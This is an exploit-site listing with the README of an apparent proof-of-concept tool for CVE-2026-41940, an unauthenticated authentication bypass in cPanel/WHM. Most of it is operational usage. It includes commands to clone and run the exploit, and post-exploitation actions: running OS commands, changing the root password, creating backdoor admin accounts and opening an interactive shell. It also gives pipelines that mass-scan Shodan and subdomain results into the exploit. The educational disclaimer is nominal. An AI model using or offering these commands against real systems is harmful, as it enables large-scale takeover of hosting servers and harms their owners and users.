Exploit for Missing Authentication for Critical Function in Cpanel CVE-2026-41940

Name: Exploit for Missing Authentication for Critical Function in Cpanel CVE-2026-41940
Rating: 5 (9 reviews)
2026-06-16 | CVSS 9.8
## https://sploitus.com/exploit?id=B4A0D8E4-449F-53A9-90ED-6F8D2F6BE281
# CVE-2026-41940
> **⚠ This tool is created solely for educational or bug bounty purpose only. Unauthorized use outside of controlled environments is strictly prohibited.**

## Description
A tool for exploiting CVE-2026-41940, a critical authentication bypass in cPanel & WHM (CVSS 10.0), allowing unauthenticated attackers to gain root-level WHM access by injecting CRLF sequences into server-side session files via the Authorization header — no credentials required.

## How it works
CVE-2026-41940, in general terms, is exploited through a breakdown in how the system handles authentication sessions in cPanel/WHM. The attack typically begins with a normal request to the login interface, where the application prematurely initializes a session before fully validating user credentials. Because of improper handling of session-related input, certain crafted or unexpected input structures can alter how session data is stored or interpreted by the server.

## Affected versions

| Version | Vulnerable | Patched |
|--------|-----------|---------|
| 110.x | ≤ 11.110.0.96 | **11.110.0.97** |
| 118.x | ≤ 11.118.0.62 | **11.118.0.63** |
| 126.x | ≤ 11.126.0.53 | **11.126.0.54** |
| 132.x | ≤ 11.132.0.28 | **11.132.0.29** |
| 134.x | ≤ 11.134.0.19 | **11.134.0.20** |
| 136.x | ≤ 11.136.0.4  | **11.136.0.5**  |

---

## Installation(Windows/Mac OS)🔄

```bash
git clone https://github.com/clsmight/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python exp.py
# MacOS/Linux
python3 exp.py
```

# How to use
The tool expects a target domain to be specified.

Single target mode:
```bash
python exp.py -u https://target1.com:2083
```
You can also scan from the `target.txt` file(create it):
```bash
python exp.py -l target.txt -t 50 -o result.json
```
## Basic scan:

Available commands:
```bash
python exp.py -u https://victim1.com:2083 # single target scan
python exp.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python exp.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.
```

# Post-Expoit actions

```bash
# List all accounts on the server
python exp.py list -u https://target.com:2087

# OS command
python exp.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python exp.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python exp.py info -u https://target.com:2087

# Change root password
python exp.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python exp.py shell -u https://target.com:2087
```
# Pipelines
```bash
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python exp.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python exp.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python exp.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python exp.py -t 20 --action list
```

# WHM Shell mode
After a succesful executuion, you can open an interactive WHM shell:
```bash
python exp.py shell -u
```

### All shell Commands

| Command | Description |
|---------|-------------|
| `id` | Show User ID |
| `hostname` | Get server hostname |
| `accounts` | List all user accounts |
| `info` | Load, disk, MySQL host, version |
| `cat ` | Read file content |
| `exec ` | Execute OS command |
| `newadmin  ` | Create backdoor WHM admin |
| `passwd ` | Change root password |
| `l [path]` | List directory |
| `help` | Show all commands |
| `exit` | Exit shell mode |

---

# CLI Reference

```
usage: exp.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors
```

# Disclaimer 

**⚠ This tool is created solely for educational or bug bounty purpose only. Unauthorized use outside of controlled environments is strictly prohibited.**